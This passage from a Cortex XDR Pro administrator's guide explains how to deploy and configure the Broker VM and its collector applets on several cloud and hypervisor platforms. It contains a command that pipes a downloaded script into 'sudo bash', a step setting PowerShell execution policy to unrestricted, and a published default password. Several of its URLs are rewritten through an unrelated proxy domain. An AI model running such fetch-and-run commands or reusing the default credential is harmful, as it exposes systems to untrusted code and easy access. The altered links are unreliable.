your network and Cortex XDR. By setting up the broker, you establish a secure connection in which you can
route your endpoints, and collect and forward logs and files for analysis.
The Broker can be leveraged for running different services separately on the VM using the same Palo Alto
Networks authentication. Once installed, the broker automatically receives updates and enhancements
from Cortex XDR, providing you with new capabilities without having to install a new VM.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 317

© 2020 Palo Alto Networks, Inc.
Set up Broker VM
The Palo Alto Networks Broker VM is a secured virtual machine (VM), integrated with Cortex XDR, that
bridges your network and the Cortex XDR app. By setting up the broker VM, you establish a secure
connection in which you can route your endpoints, collect logs, and forward logs and files for analysis.
Cortex XDR can leverage the broker VM to run different services separately using the same Palo Alto
Networks authentication. After you complete the initial setup, the broker VM automatically receives
updates and enhancements from Cortex XDR, providing you with new capabilities without having to install
a new VM or manually update the existing VM.
• Configure the Broker VM
• Activate the Agent Proxy
• Activate the Syslog Collector
• Activate the Network Mapper
• Activate Pathfinder
• Activate the Windows Event Collector

Configure the Broker VM

To set up the broker virtual machine (VM), you need to deploy an image created by Palo Alto Networks
on your network or supported cloud infrastructure and activate the available applications. You can set up
several broker VMs for the same tenant to support larger environments. Ensure each environment matches
the necessary requirements.
Before you set up the broker VM, verify you meet the following requirements:
Hardware: For standard installation, use a minimum of a 4-core processor, 8GB RAM, and 512GB disk. If
you only intend to use the broker VM for agent proxy, you can use a 2-core processor.

The broker VM comes with a 512GB disk. Therefore, deploy the broker VM with thin
provisioning, meaning the hard disk can grow up to 512GB but will do so only if needed.
VM compatible with:

Infrastructure Image Type Additional Requirements

Amazon Web Services (AWS) VMDK Create a Broker VM Amazon

Machine Image (AMI)

Google Cloud Platform VDMK Set up the Broker VM on

Google Cloud Platform (GCP)

Microsoft Azure VHD (Azure) Create a Broker VM Azure

Image

Microsoft Hyper-V 2012 VHD Hyper-V 2012 or later

VMware ESXi OVA VMware ESXi 6.0 or later

Enable communication between the Broker Service, and other Palo Alto Networks services and apps.

318 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 FQDN, Protocol, and Port Description

(Default) NTP server for clock synchronization between

the syslog collector and other apps and services.
• time.google.com
The broker VM provides default servers you can
• pool.ntp.org
use, or you can define an NTP server of your
UDP port 123 choice. If you remove the default servers, and do
not specify a replacement, the broker VM uses
the time of the host ESX.

br-<XDR Broker Service server depending on the region of

your deployment, either us or eu.
tenant>.xdr.<region>.paloaltonetworks.com
HTTPS over TCP port 443

distributions-prod- Information needed to communicate with your

us.traps.paloaltonetworks.com Cortex XDR tenant. Used by tenants deployed in
all regions.
HTTPS over TCP port 443

Enable Access to Cortex XDR from the broker VM to allow communication between agents and the
Cortex XDR app.

You must also add the Broker Service FQDNs to the SSL Decryption Exclusion list on
your Palo Alto Networks firewalls.
Configure your broker VM as follows:

STEP 1 |
In Cortex XDR, select > Settings > Broker VMs.

STEP 2 | Download and install the broker VM images for your corresponding infrastructure:
• Amazon Web Services (AWS)—Use the VMDK to Create a Broker VM Amazon Machine Image (AMI).
• Google Cloud Platform—Use the VMDK image to Set up the Broker VM on Google Cloud Platform
(GCP).
• Microsoft Hyper-V—Use the VHD image.
• Microsoft Azure—Use the VHD (Azure) image to Create a Broker VM Azure Image.
• VMware ESXi—Use the OVA image.

STEP 3 | Generate Token and copy to your clipboard.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 319

© 2020 Palo Alto Networks, Inc.
 The token is valid only for 24 hours. A new token is generated each time you select
Generate Token.

STEP 4 | Navigate to https://<broker_vm_ip_address>/.

STEP 5 | Log in with the default password !nitialPassw0rd and then define your own unique
password.

The password must contain a minimum of eight characters, contain letters and numbers,
and at least one capital letter and one special character.

STEP 6 | Configure your broker VM settings:

1. In the Network Interface section, review the pre-configured Name, IP address, and MAC Address,
select the Address Allocation: DHCP (default) or Static, and select to either to Disable or set as
Admin the network address as the broker VM web interface.

• If you choose Static, define the following and Save your configurations:
• Static IP address
• Netmask

320 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 • Default Gateway
• DNS Server

2. (Optional) Configure a Proxy Server.

• Select the proxy Type: HTTP, SOCKS4 or SOCKS5
• Enter the proxy Address, Port and an optional User and Password. Select the pencil icon to enter
the password.
• Save your configurations.

3. (Optional) (Requires Broker VM 8.0 and later) Configure your NTP servers.
Enter the required server addresses using the FQDN or IP address of the server.

4. (Requires Broker VM 8.0 and later) (Optional) In the SSH Access section, Enable or Disable SSH
connections to the broker VM. SSH access is authenticated using a public key, provided by the user.
Using a public key grants remote access to colleagues and Cortex XDR support who the private key.
You must have App Administrator role permissions to configure SSH access.
To enable connection, generate an RSA Key Pair, enter the public key in the SSH Public Key section
and Save your configuration.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 321

© 2020 Palo Alto Networks, Inc.
 5. (Requires Broker VM 10.1.9 and later) (Optional) In the SSL Certificates section, upload your signed
server certificate and key to establish a validated secure SSL connection between your endpoints and
the broker VM. Cortex XDR validates that the certificate and key match, but does not validate the
Certificate Authority.

6. (Requires Broker VM 8.0 and later) (Optional) Collect and Download Logs. Your XDR logs will
download automatically after approximately 30 seconds.

STEP 7 | Register and enter your unique Token, created in Cortex XDR console.

Registration of the Broker VM can take up to 30 seconds.

After a successful registration, Cortex XDR displays a notification.

You are directed to Cortex XDR > > Settings > Broker > VMs. The Broker VMs page displays your
broker VM details and allows you to edit the defined configurations.

322 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
Create a Broker VM Amazon Machine Image (AMI)
After you download your Cortex XDR Broker VMDK image, you can covert the image to Amazon Web
Services (AWS) AMI.
To convert the image:
Set up AWS CLI
(Optional) If you haven’t done so already, set up your AWS CLI as follows:

STEP 1 | Install the AWS zip file by running the following command on your local machine:

curl "https://s3.amazonaws.com/aws-cli/awscli-bundle.zip" -o "awscli-

bundle.zip"unzip awscli-bundle.zipsudo /usr/local/bin/python3.7 awscli-
bundle/install -i /usr/local/aws -b /usr/local/bin/aws

STEP 2 | Connect to your AWS account by running:

aws configure

Create an AMI Image

STEP 1 | Navigate and log in to your AWS account.

STEP 2 | In the AWS Console, navigate to Services > Storage > S3 > Buckets.

STEP 3 | In the S3 buckets page, + Create bucket to upload your broker image to.

STEP 4 | Upload the Broker VM VMDK you downloaded from Cortex XDR to the AWS S3 bucket.
Run

aws s3 cp ~/<path/to/broker-vm-version.vmdk> s3://<your_bucket/broker-vm-

version.vmdk>

STEP 5 | Prepare a configuration file on your hard drive.

For example:

[ { "Description":"<Broker VM Version>", "Format":"vmdk",

"UserBucket":{ "S3Bucket":"<your_bucket>",
"S3Key":"<broker-vm-version.vmdk>" } }]

STEP 6 | Create a AMI image from the VMDK file.

Run

aws ec2 import-image --description="<Broker VM Version>" --disk-

containers="file:///<file:///path/to/configuration.json>"

Creating an AMI image can take up to 60 minutes to complete.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 323

© 2020 Palo Alto Networks, Inc.
 To track the progress, use the task id value from the output and run:

aws ec2 describe-import-image-tasks --import-task-ids import-ami-<task-id>

.
Completed status output example:

{ "ImportImageTasks":[ { "...", "SnapshotDetails":

[ { "Description":"Broker VM version",
"DeviceName":"/dev/<name>",
"DiskImageSize":2976817664.0, "Format":"VMDK",
"SnapshotId":"snap-1234567890", "Status":"completed",
"UserBucket":{ "S3Bucket":"broker-vm",
"S3Key":"broker-vm-<version>.vmdk" } }
], "Status":"completed", "..." } ]}

STEP 7 | (Optional) After the AMI image has been created, you can define a new name for the image.
Navigate to Services > EC2 > IMAGES > AMIs and locate your AMI image using the task ID. Select the
pencil icon to enter a new name.

Launch an Instance

STEP 1 | Navigate to Services > EC2 > Instances.

STEP 2 | Search for your AMI image and Launch the file.

STEP 3 | In the Launch Instance Wizard define the instance according to your company requirements
and Launch.

STEP 4 | (Optional) In the Instances page, locate your instance and use the pencil icon to rename the
instance Name.

STEP 5 | Define HTTPS and SSH access to your instance.

Right-click your instance and navigate to Networking > Change Security Groups.
In the Change Security Groups pop-up, select HTTPS to be able to access the Broker VM Web UI, and
SSH to allow for remote access when troubleshooting. Make sure to allow these connection to the
broker from secure networks only.

Assigning security groups can take up to 15 minutes.

STEP 6 | Verify the broker VM has started correctly.

Locate your instance, right-click and navigate to Instance Settings > Get Instance Screenshot.
You are directed to your broker VM console listing your broker details.

Create a Broker VM Azure Image

After you download your Cortex XDR Broker VHD (Azure) image, you need to upload it to Azure as a
storage blob.

324 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 To create the image:

STEP 1 | Decompress the downloaded VHD (Azure) image. Make sure you decompress the zipped hard
disk file on a server that has more then 512GB of free space.

Decompression can take up to a few hours.

STEP 2 | Create a new storage blob on your Azure account by uploading the VHD file. You can use to
upload either from Microsoft Windows or Ubuntu.
Uploading from Microsoft Windows.
1. Verify you have:
• Windows PowerShell version 5.1 or later.
• .NET Framework 4.7.2 or later.
2. Open PowerShell and execute Set-ExecutionPolicy unrestricted.
• [Net.ServicePointManager]::SecurityProtocol =
[Net.SecurityProtocolType]::Tls12
• Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201-Force
3. Install azure cmdlets.
Install-Module -Name Az -AllowClobber
4. Connect to your Azure account.
Connect-AzAccount
5. Start the upload.
az storage blob upload -f <vhd to upload> -n <vhd name> -c <container
name> --account-name <account name>.

Upload can take up to a few hours.

Uploading from Ubuntu 18.04

1. Install Azure util.
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
2. Connect to Azure.
az login
3. Start the upload.
az storage blob upload -f <vhd to upload> -n <vhd name> -c <container
name> --account-name <account name>

STEP 3 | In the Azure home page, navigate to Azure services > Disks and +Add a new disk.

STEP 4 | In the Create a managed disk > Basics page define the following information:
Project details
• Resource group—Select your resource group.
Disk details
• Disk name—Enter a name for the disk object.
• Region—Select your preferred region.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 325

© 2020 Palo Alto Networks, Inc.
 • Source type—Select Storage Blob. Additional field are displayed, define as follows:
• Source blob—Select Browse. You are directed to the Storage accounts page. From the navigation
panel, select the bucket and then container to which you uploaded the Cortex XDR VHD image.
In the Container page, Select your VHD image.
• OS type—Select Linux
• VM generation—Select Gen 1
Review + create to check you settings.

STEP 5 | Create you broker VM disk.

After deployment is complete Go to resource.

STEP 6 | In your created Disks page, Create VM.

STEP 7 | In the Create a virtual machine page, define the following:

Instance details
• (Optional)Virtual machine name—Enter the same name as the disk name you defined.
• Size—Select the size according to your company guidelines.
Select Next to navigate to the Networking tab.
Network interface
• NIC network security group—Select Advanced.
• Configure network security group—Select HTTPS to be able to access the Broker VM Web UI, and
SSH to allow for remote access when troubleshooting. Make sure to allow these connection to the
broker from secure networks only.
Review + create to check you settings.

STEP 8 | Create your VM.

After deployment is complete Go to resource. You are directed to your VM page.

Creating the VM can take up to 15 minutes. The broker VM Web UI is not accessible
during this time.

Set up the Broker VM on Google Cloud Platform (GCP)

You can deploy the Broker VM on Google Cloud Platform. The Broker VM facilitates communication with
external services through the installation and setup of applets such as the syslog collector.
To set up the Broker VM on the Google Cloud Platform, you install the VMDK image provided in Cortex
XDR. To complete the set up, you must have G Cloud installed and have an authenticated user account.

STEP 1 | Download the Broker VM VMDK image from Cortex XDR (see Configure the Broker VM).

STEP 2 | From G Cloud, create a Google Cloud Storage bucket to store the broker VM image.
1. Create a project in GCP and enable Google Cloud Storage, for example: brokers-project. Make sure
you have defined a Default Network.
2. Create a bucket to store the image, for example: broker-vms

STEP 3 | Open a command prompt and run:

326 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 gcloud config set project <project-name>

STEP 4 | Upload the VMDK image to the bucket, run:

gsutil cp </path/to/broker.vmdk> gs://<bucket-name>

STEP 5 | Import GCP image.

You can import the GCP image using either G Cloud CLI or Google Cloud console.

The import tool uses Cloud Build API, which must be enabled in your project. For
image import to work, Cloud Build service account must have compute.admin and
iam.serviceAccountUser roles. When using the Google Cloud console to import the
image, you will be prompted to add these permissions automatically.

• gcloud CLI
The following command uses the minimum required parameters. For more information on
permissions and available parameters, refer to the Google Cloud SDK.
Open a command prompt and run:

gcloud beta compute images import <VMDK image> --os=ubuntu-1804 --source-

file="gs://<image path>" --network=<network_name> --subnet=<subnet_name>
--zone=<region> --async
• Google Cloud Console
1. Navigate to Compute Engine > Images.
2. Create Image.
3. Complete the following fields:
• Enter a meaningful Name for this image, for example: broker-9-0-32
• Select Virtual disk (VMDK, VHD) as the Source.
• To select the Cloud Storage file, Browse and select the bucket and the VMDK image you
uploaded.
• Select Ubuntu 18.04 Bionic as the Operating system on virtual disk.
• Allow Compute Engine to Install guest packages.
• Create the image.
The image creation process can take up to 20 minutes.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 327

© 2020 Palo Alto Networks, Inc.
STEP 6 | When the Google Compute completes the image creation, create a new instance.
1. From the Google Cloud Platform, select Compute Engine > VM instances.
2. Create instance.
3. In Boot disk option, choose Custom images and select the image you created.
4. In the Firewall section, Allow HTTPS traffic.
5. Set up the instance according to your needs.
If you are using the broker VM to facilitate only Agent Proxy, use e2-startdard-2. If you are using the
broker VM for multiple applets, use e2-standard-4.

328 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
STEP 7 | Continue the steps to Configure the Broker VM.

Activate the Agent Proxy

After you have configured and registered your broker VM, activate your agent proxy collector application.
You must have either Cortex XDR Prevent or Cortex XDR Pro per Endpoint licenses to activate the agent
proxy.
The Agent Proxy is used for routing all the agent traffic via a centralized and controlled access point in your
network. Each proxy on the broker VM can support up to 10,000 agents.

STEP 1 |
In Cortex XDR, navigate to Cortex XDR > > Settings > Broker > VMs table and locate your
broker VM.

STEP 2 | Right-click, select Agent Proxy > Activate.

STEP 3 | From Cortex XDR, Create an Agent Installation Package and download it to the endpoint.

The Broker Service is supported with Traps agent version 5.0.9 and Traps agent version
6.1.2 and later releases.

STEP 4 | Run the installation package on each endpoint according to the endpoint OS. During
installation you must configure the IP address of the broker VM and a port number. You can
use the default 8888 port or set a custom port. See the Cortex XDR Agent Administrator’s
Guide for installation instructions.

You are not permitted to configure port numbers between 0-1024 and 63000-65000, or
port numbers 4369, 5671, 5672, 5986, 6379, 8000, 9100, 15672, 25672. Additionally,
you are not permitted to reuse port numbers you already assigned to the Syslog Collector
applet.

STEP 5 | After a successful activation, the Apps field displays the Agent Proxy- Active.

STEP 6 | In the Apps field, select Agent Proxy to view the agent proxy Resources.

STEP 7 | Manage the Agent Proxy.

After the Agent Proxy has been activated, right-click you broker VM and select:
• Agent Proxy > Configure to redefine the port.
• Agent Proxy > Deactivate to disable the agent proxy.

Activate the Syslog Collector

Ingesting Logs and Data from external sources requires a Cortex XDR Pro per TB license.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 329

© 2020 Palo Alto Networks, Inc.
 To receive Syslog data from an external source, you must first set up the Syslog Collector applet on a
Broker VM within your network. The Syslog Collector supports a log ingestion rate of 90,000 logs per
second (lps) with the recommended Broker VM setup. To increase the log ingestion rate, you can add
additional CPUs to the broker VM. The Syslog Collector listens for logs on specific ports and from any or
specific IP addresses.

STEP 1 | If you haven’t already done so, Configure the Broker VM.

STEP 2 |
In Cortex XDR, navigate to > Settings > Broker > VMs table and locate your broker VM.

STEP 3 | Right-click the broker VM and select Syslog Collector > Activate.

STEP 4 | Configure your Syslog Collector:

Cortex XDR supports multiple sources over a single port on a single Syslog Collector. For each source,
define the following settings:

• Listening Port—Choose a port on which the Syslog Collector will listen for logs.

Because some port numbers are reserved by Cortex XDR, you must choose a port
number that is not:
• In the range of 0-1024 (except for 514)
• In the range of 63000-65000
• Values of 4369, 5671, 5672, 5986, 6379, 8000, 8888, 9100, 15672, or 25672
• Protocol—Choose a protocol over which the Syslog will be sent. use TCP for reliable and secure
transport of logs, or UDP for non-secure transport.
• Source IP—If you leave this blank, Cortex XDR will allow receipt of logs from any source IP address
that transmits over the specified protocol and port. Otherwise enter a public IP address to restrict
receipt from a specific source. Avoid using private IP addresses as these will fail Cortex XDR
validation tests.
• Syslog Format—Select the Syslog format you want to send to the listening port on the Syslog
Collector: CEF, LEEF, CISCO, or CORELIGHT.

After each configuration, select to save the changes and then Update to update the Syslog Collector
with your settings.

STEP 5 | Right-click the Broker VM on which you configured the Syslog Collector and select Syslog
Collector > Activate.
After a successful activation, the Apps field displays the Syslog Collector - Active.

330 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
STEP 6 | (Optional) To view metrics about the Syslog Collector, hover over the Syslog Collector link in
the Apps field:
Cortex XDR displays the following information:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Logs Received and Logs Sent—Number of logs received and sent by the applet per second over the
last 24 hours. If the number of incoming logs received is larger than the number of logs sent, it could
indicate a connectivity issue.
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

STEP 7 | Manage the Syslog Collector.

After the Syslog Collector has been activated, you can make additional changes to your configuration if
needed. To modify a configuration, right-click your broker VM and select:
• Syslog Collector > Configure to redefine the Syslog configurations.
• Syslog Collector > Deactivate to disable the Syslog Collector.

Activate the Network Mapper

After you have configured and registered your broker VM, you can choose to activate the Network Mapper
application.
The Network Mapper allows you to scan your network to detect and identify unmanaged hosts in your
environment according to defined IP address ranges. The Network Mapper configurations are used to
deploy the Pathfinder Data Collector on unmanaged endpoints and track and locate unmanaged assets that
appear in theAssets table.
Activating the Network Mapper requires a Cortex XDR Pro per Endpoint or Cortex XDR Pro per TB license.

STEP 1 |
In Cortex XDR, navigate to > Settings > Broker > VMs table and locate your broker VM.

STEP 2 | Right-click and select Network Mapper > Activate.

STEP 3 | In the Activate Network Mapper window, define the following parameters:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 331

© 2020 Palo Alto Networks, Inc.
 • Scan Method—Select the either ICMP echo or TCP SYN scan method to identify your network hosts.
When selecting TCP SYN you can enter single ports and ranges together, for example 80-83, 443.
• Scan Requests per Second—Define the maximum number of scan requests you want to send on your
network per second. By default, the number of scan requests are defined as 1000.

Each IP address range can receive multiple scan requests based on it's availability.

• Scanning Scheduler—Define when you want to run the network mapper scan. You can select either
daily, weekly, or monthly at a specific time.
• Scanned Ranges—Select from the list of exiting IP address ranges to scan. Make sure to after
each selection.

IP address ranges are displayed according to what you defined as your Network
Paramaters.

STEP 4 | Activate the applet.

After a successful activation, the Apps field displays the Network Mapper- Active, Connected.

STEP 5 | In the Apps filed, select Network Mapper to view the following scan and applet metrics:
• Scan Details
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Scan Status—State of the scan.
• Scan Start Time—Timestamp of when the scan started.
• Scan Duration—Period of time in minutes and seconds the scan is running.
• Scan Progress—How much of the scan has been completed in percentage and IP address ratio.
• Detected Hosts—Number of hosts identified from within the IP address ranges.
• Scan Rate—Number of IP addresses scanned per second.
• Applet Metrics
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

332 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
STEP 6 | Manage the Network Mapper.
After the network mapper has been activated, right-click you broker VM and select:
• Network Mapper > Configure to redefine the network mapper configurations.
• Network Mapper > Scan Now to initiate a scan.
• Network Mapper > Deactivate to disable the network mapper.

Activate Pathfinder
After you have configured and registered your broker VM, activate the Pathfinder application. To activate
Pathfinder, you must have a Cortex XDR Pro per Endpoint or Cortex XDR Pro per TB license.
Pathfinder™ is a highly recommended, but optional, component integrated with the Broker VM that deploys
a non-persistent data collector on network hosts, servers, and workstations that are not managed by a
Cortex XDR agent. The collector is automatically triggered by Analytics type alerts with a severity of High
and Medium as described in the Cortex XDR Analytics Alert Reference, providing insights into assets that
you would previously be unable to scan.
When an alert is triggered, the data collector is able to run for up to 2 weeks gathering EDR data from
unmanaged hosts. You can track and manage the collector directly from the Cortex XDR console, and
investigate the EDR data by running a query from the Query Center.
Cortex XDR supports activating Pathfinder on Windows operating systems with PowerShell version 3 and
above, excluding Vanilla Windows 7.
Activate the Pathfinder app to deploy and query the data collector.

STEP 1 |
In Cortex XDR, navigate to > Settings > Broker > VMs table and locate your broker VM.

STEP 2 | Right-click and select Pathfinder > Activate.

STEP 3 | In the Pathfinder Activation wizard, complete the following steps:

1. Define the Pathfinder Credentials used by the applet to access and deploy the data collector. The
Data Collector is deployed only within the ranges your defined IP address ranges. You can either
select to define the domain access credentials, or alternatively, as of broker VM version 9.0 and later,
you can define Pathfinder to access target hosts using credentials stored in your CyberArk vault.

The Broker VM requires an SA account that has administrator privileges on all

Windows workstations and servers in your environment. Due to this, Cortex XDR
recommends you limit the number of users granted access to the SA account as it
poses a credential compromise security threat.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 333

© 2020 Palo Alto Networks, Inc.
 • Domain—Domain name of your network.
• (Optional) Domain Suffixes—Domain suffixes required for DNS resolving within your network.
The domain suffixes list is read-only and populated by your defined Network Configurations.
• Authentication Method—Select either Kerberos or NTLM.

When selecting Kerberos, the Broker has access to domain controllers over port 88
and is able to acquire the authentication ticket. It is recommended to use Kerberos
for better security.
• Define the access credentials using either Domain Credentials or your CyberArk AAM
parameters.
To define the access credentials, enter:
• User Name—User name used by Pathfinder to access your target host.
• Password—Password used by Pathfinder to access your target host.

Only encrypted credentials are stored on the broker VM.

To allow Pathfinder to use credentials stored in your CyberArk vault, enter the following
parameters. Make sure you are following the CyberArk guidelines.
• URL—Your CyberArk AAM URL address.
• Port—Your CyberArk AAM port number.
• App ID—The application ID configured in your CyberArk AAM. The ID allows you to access the
path to where credentials are stored in the CyberArk vault.
• Query—Define the CyberArk AAM path to the credentials required by Pathfinder to access the
host. Make sure you are following the CyberArk formatting guidelines.

334 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 • Browse for your Client Certificate, Client Key, and CA Certificate you use to identify. Cortex
XDR will notify you when your certificates are about to expire.

Credentials are not stored on the broker VM, Pathfinder queries CyberArk each
time according to the defined parameters.
• Test the credentials and pathfinder permissions to ensure the broker VM can successfully collect
data from your defined hosts.

Testing may take a few minutes to complete but ensures that pathfinder can indeed
deploy a data collector.
Select Next.
2. Define the data collector Settings.

• Select on which Targets to deploy the data collector. Target types are detected according to your
operating system.
• All—Deploy on all assets within your network.
• Servers—Deploy only on servers.
• Workstations—Deploy only on workstations.
• Define the Proxy Settings.
By default the proxy settings are disabled, data collected is sent directly to the cloud. If you want
to enable the proxy, select one of the following options:
• Use Agent Proxy Settings—Data collected will be routed using the settings provided in the
Agent Proxy Applet. Agent proxy applet must be enabled for this settings to work.
• Use Custom Proxy—Define the IP address and port to route the data.
Select Next.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 335

© 2020 Palo Alto Networks, Inc.
 3. Select the IP Address Ranges to scan from the your defined Network Configurations and deploy the
data collector. You can Add IP Address Ranges if you don’t see a range in the populated list.
By default, every IP address range will use the Pathfinder credentials and settings you defined in the
Credentials section, and is labeled as an Applet Configuration.
If you want configure other credentials for a specific range, use the right pane to override the
settings. IP address ranges you edit are labeled as a Custom Configuration. Make sure to Test the
credentials for this specific range.

The Pathfinder configuration must contain at least one IP address range to run. To
avoid collision, IP address ranges can only be associated with one pathfinder applet.

4. Activate your Pathfinder.

After a successful activation, the Apps field displays the Pathfinder - Active, Connected.

STEP 4 | In the Apps filed, select Pathfinder to view the following applet metrics:
• Connectivity Status—Whether the applet is connected to Cortex XDR.
• Handled Tasks—How many collectors are in progress, pending, or successfully running out of the
number of collectors that need to be setup.
• Failed Tasks—How many collectors have failed
• Resources—Displays the amount of CPU, Memory, and Disk space the applet is using.

336 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
STEP 5 | Manage the Pathfinder.
Right-click your broker VM and select:
• Pathfinder > Edit Configuration to redefine your pathfinder configurations.
• Pathfinder > Edit Credentials to redefine the user name and password.
You can select to edit credentials for multiple Pathfinder applets. However, only IP address ranges
that are using the default defined credentials, labled as Applet Configuration, will adopt your changes.
• Pathfinder > Deactivate to remove pathfinder.

STEP 6 | Track the Pathfinder Data Collector.

After the Pathfinder collector has been triggered, when an analytics type alert is triggered on an
unmanaged host, the data collector is deployed to unmanaged assets within the defined IP address
ranges and domain names.

The data collector is only deployed on unmanaged hosts, if you want to install the Cortex
XDR agent on an unmanaged host you must first remove the collector.

To track the data collector:

1.
In Cortex XDR, navigate to > Settings > Broker > Pathfinder Collection Center.

The Pathfinder Collection Center table displays the following fields about each of the deployed
collectors:

Field Description

Collector Install Time Timestamp of when the collector was installed

in the host.

Initiating Alert ID Displays the Alert ID of the analytics alert that

triggered the collector.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 337

© 2020 Palo Alto Networks, Inc.
 Field Description

Initiating VM Name of the broker VM initiating the collector.

Last Seen Timetamp of the last collector heartbeat.

Result Status of the collection process. Can be either:

• Collection Completed
• Collection Completed

Start Time Timestamp of when the collector was triggered.

Status Status of the collector on the host. Can be

either:
• Pending
• Running
• Completed
• Failed
• Removed

Target IP IP Address of the host scanned by the collector.

2. Manage the collector.
• Set the number of collectors you want deployed. Set Collectors Number to limit the number of
collectors you want to deploy in your environment.
• Locate the collector, right-click and select:
• Remove Collector—Uninstall the collector from the host.
• View Initiating alert—Pivot to the Alerts Table filtered according to the initiating alert.
• Retrieve Logs—Upload logs from the collector
• Download Logs—Download the collector logs to your local machine.
When you select and right-click the Target IP field, you can choose to view the IP address in the
IP View or Open in Quick Launcher.

STEP 7 | Query the collector data.

Data gathered by the data collector can be queried and investigated from the Query Center. To run a
query on the EDR data from an unmanaged host:
1. Navigate to Investigation > Query Center.
2. Select the type of query you want to run and enter the search criteria.
When defining the Host attributes, for INSTALLATION TYPE make sure to select Data Collector.
3. View your query results.

Activate the Windows Event Collector

After you have configured and registered your broker VM, activate your Windows Event Collector
application.
The Windows Event Collector (WEC) runs on the broker VM collecting event logs from Windows Servers,
including Domain Controllers (DCs). To enable the collection of the event logs, you need to configure them
as Windows Event Forwarders (WEFs), and establish trust between them and the WEC. Establishing trust

338 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 between the WEFs and the WEC is achieved by mutual authentication over TLS using server and client
certificates.
The WEF, a WinRM plugin, runs under the Network Service account. Therefore, you need to provide the
WEFs with the relevant certificates and grant the account access permissions to the private key used for
client authentication, for example, authenticate with WEC.
Ensure you meet the following prerequisites before activating the collector:
• Cortex XDR Pro per TB license
• Broker VM version 8.0 and later
• You have knowledge of Windows Active Directory and Domain Controllers.
• Broker VM is registered in the DNS and its FQDN is resolvable from the events forwarder (Windows
server).
• Windows Server 2012 or later.

STEP 1 | In Cortex XDR, navigate to Cortex XDR > Settings > Broker > VMs table and locate your
broker VM.

STEP 2 | Right-click and select Windows Event Collector > Activate.

(Optional) If you already have a Windows Event Collector signed certificate, migrate your existing CA to
the Cortex XDR console.

STEP 3 | In the Activate Windows Event Collector window, define the following:

• Set your Broker VM FQDN as it will be defined in your Domain Name System (DNS). This enables
connection between Cortex XDR and your Windows Event Collector.
• Define the events collected by the applet. This lists event sources from which you want to collect
events:
• Source—Select from the pre-populated list with the most common event sources on Windows
Servers. The event source is the name of the software that logs the events.
A source provider can only appear once in your list.
• Min. Event Level—Minimum severity level of events that are collected.
• Event IDs Group—Whether to Include, Exclude, or collect All event ID groups.
• (Optional) Event IDs— Define specific event IDs or event ID ranges you want to collect.

Make sure to select after each entry.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM 339

© 2020 Palo Alto Networks, Inc.
 By default, Cortex XDR collects Palo Alto Networks predefined Security events that are used by the
Cortex XDR detectors.

Removing the Security collector interferes with the Cortex XDR detection functionality.
Restore to Default to reinstate the Security event collection.
When selecting event sources, ensure the event source is enabled on the Windows events forwarder. If
the source is not enabled, the source configuration (in the given row) will fail. For more information see
the Windows documentation.

STEP 4 | Activate your configurations.

After a successful activation, the Apps field displays the Windows Event Collector - Active,
Connected.

STEP 5 | In the Windows Event Forwarder Configuration window:

1.
(copy) the Subscription Manage URL. This will be used when you configure the subscription
manager in the GPO (Global Policy Object) on your DC.
2. Define Client Certificate Export Password used to secure the downloaded Windows Event
Forwarders (WEF) certificate used to establish connection between Cortex XDR and the Windows
Event collector. You will need this password when the certificate is imported to the events forwarder.
3. Download the WEF certificate in a PFX format.
To view your Windows Event Forwarder Configuration details at any time, select your Broker VM,
right-click and navigate to Windows Event Collector > Configure Forwarder.
Cortex XDR monitors the certificate and triggers an Certificate Expiration notification 30 days prior to
the expiration date. The notification is sent daily specifying the number of days left on the certificate, or
if the certificate has already expired.

STEP 6 | Install your WEF Certificate on the events forwarder to establish connection.
1. Copy the PFX file you downloaded from the Cortex XDR console to your events forwarder, double-
click the file and import it to Local Machine.
2. Run certlm.msc.
3. Navigate to Certificates > Personal and verify the following:
• In the Personal > Certificates folder, ensure the certificate has been imported.
• In the Trusted Root Certification Authorities folder, ensure the CA was added.

340 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM

© 2020 Palo Alto Networks, Inc.
 4. Navigate to Certificates > Personal > Certificates.
